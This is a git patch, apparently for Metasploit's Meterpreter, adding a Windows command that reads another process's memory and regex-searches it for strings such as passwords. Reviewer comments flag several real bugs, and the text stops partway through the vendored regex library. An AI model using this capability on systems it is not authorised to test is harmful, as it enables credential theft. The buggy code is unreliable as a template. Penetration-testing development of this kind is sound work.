From 6e2889d64caf1787ba41e67e6db981024c0b2d87 Mon Sep 17 00:00:00 2001
From: sjanusz-r7
Date: Tue, 28 Nov 2023 18:35:43 +0000
Subject: [PATCH 01/14] Add Windows Memory Search support using regex
---
 .../source/common/common_command_ids.h | 1 +
 .../source/extensions/stdapi/server/stdapi.c | 1 +
 .../stdapi/server/sys/process/memory.c | 341 ++++++++++++
 .../stdapi/server/sys/process/process.h | 1 +
 .../source/extensions/stdapi/stdapi.h | 9 +
 c/meterpreter/source/tiny-regex-c/README.md | 3 +
 c/meterpreter/source/tiny-regex-c/re.c | 511 ++++++++++++++++++
 c/meterpreter/source/tiny-regex-c/re.h | 75 +++
 .../ext_server_stdapi/CMakeLists.txt | 2 +
 .../ext_server_stdapi.vcxproj | 2 +
 10 files changed, 946 insertions(+)
 create mode 100644 c/meterpreter/source/tiny-regex-c/README.md
 create mode 100644 c/meterpreter/source/tiny-regex-c/re.c
 create mode 100644 c/meterpreter/source/tiny-regex-c/re.h
diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h
index f7ee80d66..e9951eecd 100755
--- a/c/meterpreter/source/common/common_command_ids.h
+++ b/c/meterpreter/source/common/common_command_ids.h
@@ -174,6 +174,7 @@
 #define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115
 #define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116
 #define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119
 #define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
 #define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
 #define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003
diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
index cfa15fd8d..c9f54d2d0 100644
--- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c
+++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -69,6 +69,7 @@ Command customCommands[] = COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock), + COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search), // Thread COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open), diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 597f5d964..ea8ae32be 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -1,5 +1,6 @@ #include "precomp.h" #include "common_metapi.h" +#include "../tiny-regex-c/re.h" /*! * @brief Allocates memory in the context of the supplied process. 
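Review bot: The added `#include "../tiny-regex-c/re.h"` in memory.c does not resolve relative to the file's own directory (sys/process/ has no sibling tiny-regex-c/; the library is added under c/meterpreter/source/tiny-regex-c/), so it only works through an include directory that the CMakeLists.txt and .vcxproj changes listed in the diffstat presumably add. Please confirm that both build files set that path, or use a path that is unambiguous from the file's location. A one-line comment next to the include, e.g. `// tiny-regex-c is found via the stdapi include path, not relative to this file`, would save the next reader the search.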
@@ -339,3 +340,343 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } + +typedef NTSTATUS* PNTSTATUS; + +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) + +#ifndef __kernel_entry + #define __kernel_entry +#endif + +typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); + +typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead); + +typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); + +typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); + +typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html +// https://ntdoc.m417z.com/ntreadvirtualmemory +typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html +typedef enum _MEMORY_INFORMATION_CLASS { + MemoryBasicInformation +} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html +typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, 
PSIZE_T ResultLength); + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; + +// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057 +typedef struct _CLIENT_ID { + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, * PCLIENT_ID; + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html +// https://ntdoc.m417z.com/ntopenprocess +typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); + +//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes +//{ +// DWORD dwLength; +// DWORD dwInitialized; +// LPVOID lpSsHandle; +// LIST_ENTRY InLoadOrderModuleList; +// LIST_ENTRY InMemoryOrderModuleList; +// LIST_ENTRY InInitializationOrderModuleList; +// LPVOID lpEntryInProgress; +//} PEB_LDR_DATA, * PPEB_LDR_DATA; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + +typedef +VOID +(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _PEB { + BYTE Reserved1[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + BYTE Reserved4[104]; + PVOID Reserved5[52]; + PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; + 
BYTE Reserved6[128]; + PVOID Reserved7[1]; + ULONG SessionId; +} PEB, * PPEB; + +typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PPEB PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessWow64Information = 26 +} PROCESSINFOCLASS; + +BOOL can_read_memory(DWORD memory_protect) +{ + const int page_execute_read = 0x20; + const int page_execute_readwrite = 0x40; + const int page_readonly = 0x02; + const int page_readwrite = 0x04; + + return memory_protect == page_execute_read || + memory_protect == page_execute_readwrite || + memory_protect == page_readonly || + memory_protect == page_readwrite; +} + +// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string. +struct regex_needle +{ + char* raw_needle_buffer; + size_t length; + regex_t* compiled_needle; +}; + +#define NEEDLES_MAX (size_t)5 + +DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) +{ + Packet* response = met_api->packet.create_response(packet); + DWORD result = ERROR_SUCCESS; + char* buffer = NULL; + size_t needle_enum_index = 0; + HANDLE process_handle = NULL; + + dprintf("[MEM SEARCH] Getting PID..."); + const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); + if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } + dprintf("[MEM SEARCH] Searching PID: %lu", pid); + + // Iterate over all the needles in the packet. + Tlv needle_buffer_tlv = { 0 }; + struct regex_needle* regex_needles[NEEDLES_MAX]; + while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + { + // The header contains a null-terminator which we do not need. 
+ const size_t needle_length = needle_buffer_tlv.header.length - 1; + dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); + regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); + if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } + + regex_needles[needle_enum_index]->length = needle_length; + regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); + if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; } + memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length); + + dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length); + + dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer); + regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length); + if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; } + + needle_enum_index++; + } + + dprintf("[MEM SEARCH] Getting Match Lengths"); + const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT); + const size_t max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN); + if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; } + const size_t current_max_match_length = max_match_length; + + 
dprintf("[MEM SEARCH] Getting handles & proc addresses"); + const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll"); + if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } + + const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll"); + if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } + + const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress"); + if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; } + const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address; + + const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx"); + if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess"); + if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle"); + if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory"); + if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const OPENPROCESS OpenProcess = (OPENPROCESS)open_process; + const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle; + const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex; + const NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory; + + const DWORD process_vm_read = 0x0010; + const DWORD 
process_query_information = 0x0400; + const DWORD wanted_process_perms = process_vm_read | process_query_information; + + dprintf("[MEM SEARCH] Opening process"); + process_handle = OpenProcess(wanted_process_perms, FALSE, pid); + if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } + + MEMORY_BASIC_INFORMATION mem = { 0 }; + const size_t megabytes_64 = 64 * 1024 * 1024; + + dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); + buffer = (char*)malloc(megabytes_64); + if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + + // The maximum length of data that we can read into a buffer at a time from a memory region. + const size_t current_max_size = megabytes_64; + + for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + { + if (!can_read_memory(mem.Protect)) { continue; } + + size_t memory_region_offset = 0; + // Note: This currently does not support regex'ing over multiple memory regions. + // e.g. + // regex = "my_password.*"; + // | ....my_pas | sword.... | + while (mem.RegionSize > memory_region_offset) + { + const size_t leftover_bytes = mem.RegionSize - memory_region_offset; + const size_t bytes_to_read = min(leftover_bytes, current_max_size); + dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); + dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); + size_t bytes_read = 0; + + const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; + // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. 
+ const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); + if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } + + dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); + // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. + if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; } + + for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) + { + // This is the buffer offset for this needle only. + size_t current_buffer_offset = 0; + size_t match_length = 0; + int result = -1; + + do + { + const char* current_buffer_ptr = buffer + current_buffer_offset; + const size_t bytes_to_regex = bytes_read - current_buffer_offset; + + result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length); + + if (result != -1) + { + const size_t match_address = read_address + result; + dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); + dprintf("[MEM SEARCH] Address: %p", match_address); + + dprintf("[MEM SEARCH] Creating results group"); + + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + + dprintf("[MEM SEARCH] Adding Match bytes"); + // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. 
+ const size_t current_match_length = min(max_match_length, match_length); + + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. + met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length); + + dprintf("[MEM SEARCH] Adding Match address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + + dprintf("[MEM SEARCH] Adding Region base address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress); + + dprintf("[MEM SEARCH] Adding Region size"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize); + + dprintf("[MEM SEARCH] Adding Match Length"); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length); + + dprintf("[MEM SEARCH] Adding Group"); + met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + current_buffer_offset += (result + current_match_length); + } + + } while (result != -1); + + } + + memory_region_offset += bytes_to_read; + } + } + + result = ERROR_SUCCESS; + +done: + dprintf("[MEM SEARCH] Memory Search complete."); + if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); } + + dprintf("[MEM SEARCH] Cleaning up needles"); + for (size_t i = 0; i < needle_enum_index; i++) + { + if (regex_needles[i] != NULL) + { + if (regex_needles[i]->raw_needle_buffer != NULL) + { + dprintf("[MEM SEARCH] Freeing needle buffer"); + free(regex_needles[i]->raw_needle_buffer); + } + + dprintf("[MEM SEARCH] Freeing regex needle."); + free(regex_needles[i]); + } + } + + dprintf("[MEM SEARCH] Transmitting response"); + 
met_api->packet.transmit_response(result, remote, response); + return ERROR_SUCCESS; +} diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h index da04b4d23..85ca089cf 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h @@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet); DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet); DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet); DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet); +DWORD request_sys_process_memory_search(Remote *remote, Packet *packet); // Thread DWORD request_sys_process_thread_open(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h index 7ee5303a3..adc2b5b52 100755 --- a/c/meterpreter/source/extensions/stdapi/stdapi.h +++ b/c/meterpreter/source/extensions/stdapi/stdapi.h 
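Review bot: `const size_t match_address = read_address + result;` reports a wrong address for every match after the first within a read chunk, because `result` is an index relative to `current_buffer_ptr` (= `buffer + current_buffer_offset`) and only the match bytes a few lines later correctly use `buffer + current_buffer_offset + result`; the address needs `current_buffer_offset` added too. The inner `int result = -1;` also shadows the function's `DWORD result`, so `result = ERROR_OUTOFMEMORY; goto done;` after a failed `create_group()` assigns the dead inner variable and the client is sent whatever the outer status held, i.e. ERROR_SUCCESS. A zero-length match (a pattern such as `x*` matching at index 0) makes `current_buffer_offset += (result + current_match_length);` a no-op, so the do/while never terminates and keeps appending result groups; the offset must advance by at least one byte. Separately, `re_compile()` in the re.c hunk of this patch returns its static `re_compiled` array, so every `compiled_needle` collected in the needle loop aliases the last compiled pattern and only one needle is effectively searched, and the `goto done` paths inside that loop run before `needle_enum_index++`, so the cleanup loop leaks the partially built `regex_needles[needle_enum_index]`. The rewrite of the per-needle loop below addresses the first three points.
```c
			for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++)
			{
				// This is the buffer offset for this needle only.
				size_t current_buffer_offset = 0;
				size_t match_length = 0;
				int match_index = -1; // not 'result': that name is the function's DWORD status that 'goto done' transmits

				do
				{
					const char* current_buffer_ptr = buffer + current_buffer_offset;
					const size_t bytes_to_regex = bytes_read - current_buffer_offset;

					match_index = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length);
					if (match_index == -1) { break; }

					// match_index is relative to current_buffer_ptr, so the offset is part of the reported address.
					const size_t match_address = read_address + current_buffer_offset + match_index;
					const size_t current_match_length = min(max_match_length, match_length);

					Packet* search_results = met_api->packet.create_group();
					if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; }

					// … unchanged apart from result -> match_index: add_tlv_raw / add_tlv_qword / add_tlv_uint calls and add_group …

					// Always advance: a zero-length match would otherwise re-match at the same offset forever.
					current_buffer_offset += match_index + (current_match_length > 0 ? current_match_length : 1);
				} while (current_buffer_offset < bytes_read);
			}
```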
@@ -98,6 +98,15 @@ #define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 ) #define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 ) +// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262 +#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 ) +#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 ) +#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 ) +#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 ) + // Registry #define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 ) #define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY diff --git a/c/meterpreter/source/tiny-regex-c/README.md b/c/meterpreter/source/tiny-regex-c/README.md new file mode 100644 index 000000000..a32fdb14e --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/README.md @@ -0,0 +1,3 @@ +# tiny-regex-c + +This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes. diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c new file mode 100644 index 000000000..0568bb994 --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.c 
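Review bot: `TLV_TYPE_MEMORY_SEARCH_MATCH_STR` is declared with `TLV_META_TYPE_STRING`, yet the memory.c hunk in this patch fills it with `add_tlv_raw` from a process-memory buffer that can contain embedded NUL bytes (the stated reason for the tiny-regex-c changes), so any consumer that treats the value as a C string would truncate matches at the first NUL. If the id and meta type are fixed by Mettle compatibility, say so in the comment, e.g. `// MATCH_STR carries raw bytes (may contain NULs); STRING meta type kept for Mettle compatibility`; otherwise `TLV_META_TYPE_RAW` describes the payload better. The minimum match length has no TLV of its own here and memory.c reads it from the generic `TLV_TYPE_UINT`, which deserves either a dedicated type alongside these or a comment explaining why the generic one is used.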
@@ -0,0 +1,511 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + + +#include "re.h" +#include +#include + +/* Definitions: */ + +#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. 
*/ + + +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; + +/* Private function declarations: */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchcharclass(char c, const char* str); +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchone(regex_t p, char c); +static int matchdigit(char c); +static int matchalpha(char c); +static int matchwhitespace(char c); +static int matchmetachar(char c, const char* str); +static int matchrange(char c, const char* str); +static int matchdot(char c); +static int ismetachar(char c); + + + +/* Public functions: */ +int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength) +{ + return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength); +} + +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength) +{ + *matchlength = 0; + + if (pattern == 0 || text_length == 0) { return -1; } + + if (pattern[0].type == BEGIN) + { + return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1); + } + + size_t idx = -1; + + do + { + idx += 1; + + if (matchpattern(pattern, text, text_length, idx, matchlength)) + { + return (int)idx; + } + } + while (idx < text_length); + + return -1; +} + +re_t re_compile(const char* pattern, size_t pattern_length) +{ + /* The sizes of the two static arrays below substantiates the static RAM usage of this module. + MAX_REGEXP_OBJECTS is the max number of symbols in the expression. 
+ MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */ + static regex_t re_compiled[MAX_REGEXP_OBJECTS]; + static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN]; + int ccl_bufidx = 1; + + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; + + switch (c) + { + /* Meta-characters: */ + case '^': { re_compiled[j].type = BEGIN; } break; + case '$': { re_compiled[j].type = END; } break; + case '.': { re_compiled[j].type = DOT; } break; + case '*': { re_compiled[j].type = STAR; } break; + case '+': { re_compiled[j].type = PLUS; } break; + case '?': { re_compiled[j].type = QUESTIONMARK; } break; +/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': + { + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ + i += 1; + /* ... and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { re_compiled[j].type = DIGIT; } break; + case 'D': { re_compiled[j].type = NOT_DIGIT; } break; + case 'w': { re_compiled[j].type = ALPHA; } break; + case 'W': { re_compiled[j].type = NOT_ALPHA; } break; + case 's': { re_compiled[j].type = WHITESPACE; } break; + case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. 